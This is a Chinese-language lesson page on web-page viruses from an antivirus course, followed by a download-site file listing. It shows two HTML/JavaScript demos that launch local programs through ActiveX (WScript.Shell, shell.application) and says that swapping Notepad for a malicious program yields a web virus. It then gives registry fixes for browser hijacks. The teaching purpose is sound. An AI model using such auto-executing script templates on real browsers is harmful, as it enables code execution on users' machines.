<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>计算机病毒检测与防治</title>
</head>
<body background="picture/Bg.gif">
<p align="center"><font size="5"><b>§3.2 网页病毒</b></font></p>
<p><font size="+1"> 网页病毒是目前比较流行的一类病毒,由病毒隐含在网页中而得名。网页病毒既有可能是网页的编制者自己插入的,也有可能是被黑客强行挂上去的。</font></p>
<p><font size="+1"> 1、什么是网页病毒<br>
<br>
网页病毒主要是利用IE浏览器或操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的Applet小应用程序、JavaScript/VBScript脚本语言程序或是ActiveX控件等可自动执行的代码程序,以强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取用户文件,或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。 </font></p>
<p><font size="+1">由于Applet设计时已经考虑到安全问题,所以实际上至今未发现纯粹由Applet设计出的网页病毒。而JavaScript/VBScript脚本语言本身也有一定的安全机制,所以它们多半要依靠调用ActiveX控件来实现病毒代码。</font></p>
<p><font size="+1">下面有两个小例子,演示了网页病毒是如何工作的。</font></p>
<p><font size="+1">例子1 创建一个ActiveX对象,执行本地的记事本程序</font></p>
<table width="595" border="1">
<tr>
<td width="630"><font color="#000099" size="+1"><html><br>
<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no"><br>
<body><br>
说明:可以自己加入其他代码或控件<br>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <br>
<script language=javascript><br>
wsh.Run("notepad.exe");//打开记事本程序,可改为自己要执行的程序<br>
window.close();//关闭hta文件<br>
</script><br>
</body><br>
</html></font></td>
</tr>
</table>
<p><font size="+1"> 用IE打开这个网页后,如果IE的安全规则没有禁用ActiveX,将会询问用户是否执行ActiveX。用户如果选择“是”,记事本将会运行。</font></p>
<p><font size="+1">例子2 利用默认的ActiveX对象,执行本地的记事本程序</font></p>
<table width="592" border="1">
<tr>
<td width="582"><font color="#0000CC" size="+1"><html><br>
<body><br>
<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT> <br>
</body><br>
</html></font></td>
</tr>
</table>
<p><font size="+1"> 如果IE6.0没有打补丁,那么它会在没有任何提示的情况下,自动运行记事本。</font></p>
<p><font size="+1"> 如果将上面两个网页中的记事本改成任何恶意程序,这就是一个典型的网页病毒。</font></p>
<p><font size="+1">2、网页病毒的性质及特点</font></p>
<p><font size="+1"> 相对于PE病毒而言,网页病毒较少是纯粹的恶作剧,多半都掺杂了明确的经济利益在里面。它的恶意破坏代码少,主要表现为劫持IE浏览器,使用户每次启动浏览器后自动连接到病毒指定的网站上,增加该网站的流量。<br>
<br>
<br>
3、网页病毒的危害:</font></p>
<p><font size="+1">(1)默认主页被修改<br>
<br>
1.破坏特性:默认主页被自动改为某网站的网址。<br>
<br>
2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。<br>
<br>
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main 分支,找到Default_Page_URL键值名(用来设置默认主页),在右窗口点击右键进行修改即可。按F5键刷新生效。<br>
<br>
危害程度:一般<br>
<br>
(2)默认首页被修改<br>
<br>
1.破坏特性:默认首页被自动改为某网站的网址。<br>
<br>
2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。<br>
<br>
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main分支,找到StartPage键值名(用来设置默认首页),在右窗口点击右键进行修改即可。按F5键刷新生效。<br>
<br>
危害程度:一般<br>
<br>
(3)默认的微软主页被修改<br>
<br>
1.破坏特性:默认微软主页被自动改为某网站的网址。<br>
<br>
2.表现形式:默认微软主页被篡改。<br>
<br>
3.清除方法:<br>
<br>
手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main 分支,找到Default_Page_URL键值名(用来设置默认微软主页),在右窗口点击右键,将键值修改为 http://www.microsoft.com/windows/ie_intl/cn/start/ 即可。按F5键刷新生效。<br>
<br>
自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。<br>
<br>
REGEDIT4<br>
<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] <br>
"default_page_url"="http://www.microsoft.com/windows/ie_intl/cn/start/" <br>
<br>
危害程度:一般<br>
<br>
(4)主页设置被屏蔽锁定,且设置选项无效不可更改<br>
<br>
1.破坏特性:主页设置被禁用。<br>
<br>
2.表现形式:主页地址栏变灰色被屏蔽。<br>
<br>
3.清除方法:</font></p>
<p><font size="+1"> 手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\分支,新建“ControlPanel”主键,然后在此主键下新建键值名为“HomePage”的DWORD值,值为“00000000”,按F5键刷新生效。<br>
<br>
自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。<br>
<br>
REGEDIT4<br>
<br>
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] <br>
"HomePage"=dword:00000000<br>
<br>
危害程度:轻度<br>
<br>
(5)默认的IE搜索引擎被修改<br>
<br>
1.破坏特性:将IE的默认微软搜索引擎更改。<br>
<br>
2.表现形式:搜索引擎被篡改。<br>
<br>
3.清除方法:</font></p>
<p><font size="+1"> 手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search分支,找到“SearchAssistant”键值名,在右面窗口点击“修改”,即可对其键值进行输入为: http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ,然后再找到“CustomizeSearch”键值名,将其键值修改为: http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ,按F5键刷新生效。<br>
<br>
自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。<br>
<br>
REGEDIT4<br>
<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Search] <br>
"SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm" <br>
"CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm" <br>
<br>
危害程度:一般</font></p>
<p><font size="+1"> (6)IE标题栏被添加非法信息<br>
1.破坏特性:通过修改注册表,使IE标题栏被强行添加宣传网站的广告信息。<br>
<br>
2.表现形式:在IE顶端蓝色标题栏上多出了什么“正点网,即使正点网! http://www.zhengdian.com "尾巴。<br>
<br>
3.清除方法:</font></p>
<p><font size="+1"> 手动
没有合适的资源?快使用搜索试试~ 我知道了~
计算机病毒检测与防治.zip
共124个文件
jpg:68个
htm:53个
gif:3个
需积分: 0 6 下载量 59 浏览量
2009-01-01
22:22:34
上传
评论
收藏 3.12MB ZIP 举报
温馨提示
让你学会基本的拒绝病毒的方法,我本人觉得很实用 。。。
资源详情
资源评论
资源推荐
收起资源包目录
计算机病毒检测与防治.zip (124个子文件)
antivirus03_03_01.gif 15KB
antivirus06_01_01.gif 14KB
Bg.gif 3KB
antivirus03_02.htm 15KB
antivirus08_01.htm 15KB
antivirus05_05.htm 13KB
antivirus08_05.htm 10KB
antivirus01_02.htm 10KB
antivirus04_04.htm 9KB
antivirus09_06.htm 8KB
antivirus03_04.htm 8KB
antivirus08_02.htm 8KB
antivirus01_09.htm 8KB
antivirus06_01.htm 8KB
antivirus03_01.htm 7KB
antivirus04_02.htm 6KB
antivirus01_03.htm 6KB
antivirus03_03.htm 6KB
antivirus01_05.htm 6KB
antivirus05_04.htm 6KB
antivirus09_01.htm 6KB
antivirus02_04.htm 5KB
antivirus06_03.htm 5KB
antivirus08_06.htm 5KB
antivirus01_01.htm 4KB
antivirus01_06.htm 4KB
index.htm 4KB
antivirus09_05.htm 4KB
antivirus07_01.htm 4KB
antivirus05_07.htm 4KB
antivirus01_10.htm 4KB
antivirus07_09.htm 4KB
antivirus05_01.htm 4KB
antivirus06_02.htm 4KB
antivirus02_02.htm 4KB
antivirus04_01.htm 3KB
antivirus08_04.htm 3KB
antivirus05_02.htm 3KB
antivirus09_04.htm 3KB
antivirus07_06.htm 3KB
antivirus01_04.htm 3KB
antivirus02_03.htm 3KB
antivirus08_03.htm 3KB
antivirus07_04.htm 3KB
antivirus07_05.htm 3KB
antivirus09_07.htm 3KB
antivirus09_02.htm 3KB
antivirus02_01.htm 3KB
antivirus07_03.htm 2KB
antivirus01_07.htm 2KB
antivirus07_02.htm 2KB
antivirus04_03.htm 2KB
antivirus01_08.htm 2KB
antivirus05_03.htm 2KB
antivirus09_03.htm 1KB
model.htm 472B
antivirus09_06_02.jpg 135KB
antivirus08_04_05.jpg 127KB
antivirus09_06_04.jpg 115KB
antivirus08_04_04.jpg 114KB
antivirus09_06_01.jpg 103KB
antivirus09_04_02.jpg 99KB
antivirus09_07_08.jpg 98KB
antivirus08_04_01.jpg 98KB
antivirus09_06_03.jpg 95KB
antivirus09_07_04.jpg 83KB
antivirus08_01_11.jpg 82KB
antivirus09_07_07.jpg 81KB
antivirus09_07_03.jpg 79KB
antivirus09_06_05.jpg 78KB
antivirus09_07_06.jpg 78KB
antivirus08_01_09.jpg 76KB
antivirus08_01_02.jpg 69KB
antivirus08_04_03.jpg 67KB
antivirus09_07_02.jpg 66KB
antivirus08_01_07.jpg 65KB
antivirus09_04_03.jpg 65KB
antivirus08_01_04.jpg 64KB
antivirus09_05_01.jpg 64KB
antivirus08_01_06.jpg 63KB
antivirus08_01_05.jpg 60KB
antivirus08_01_03.jpg 59KB
antivirus09_05_04.jpg 59KB
antivirus09_06_06.jpg 58KB
antivirus06_01_03.jpg 58KB
antivirus09_05_02.jpg 57KB
antivirus08_02_03.jpg 56KB
antivirus08_03_03.jpg 54KB
antivirus09_06_07.jpg 54KB
antivirus08_03_02.jpg 53KB
antivirus09_07_01.jpg 53KB
antivirus08_01_12.jpg 52KB
antivirus08_01_08.jpg 51KB
antivirus08_02_08.jpg 50KB
antivirus09_05_03.jpg 50KB
antivirus08_01_01.jpg 50KB
antivirus08_02_01.jpg 46KB
antivirus09_05_05.jpg 45KB
antivirus09_07_05.jpg 44KB
antivirus08_02_10.jpg 44KB
共 124 条
- 1
- 2
abcdarr
- 粉丝: 0
- 资源: 1
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 使用ASP.NET Core和Entity Framework Core来构建一个基本的进销存系统.rar
- 深度学习经典数据集+FER2013面部表情识别+附带使用方法的python代码
- Python中,要实现连接多个相机并识别多个二维码.rar
- 使用FFT算法对一个信号进行分析.rar
- 171cms游戏应用下载系统源码.zip
- 基于jsp+servlet+mysql蛋糕甜品店购物网站源码+数据库(期末大作业).zip
- Java项目:在线蛋糕商城系统(java+jsp+mysql)源码+数据库+期末大作业.zip
- ZapyaClient10_7-1.apk
- 织梦cms站长导航网站源码.zip
- 基于SSM+MySQL的网络投票调查问卷系统源码+数据库(java期末大作业).zip
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0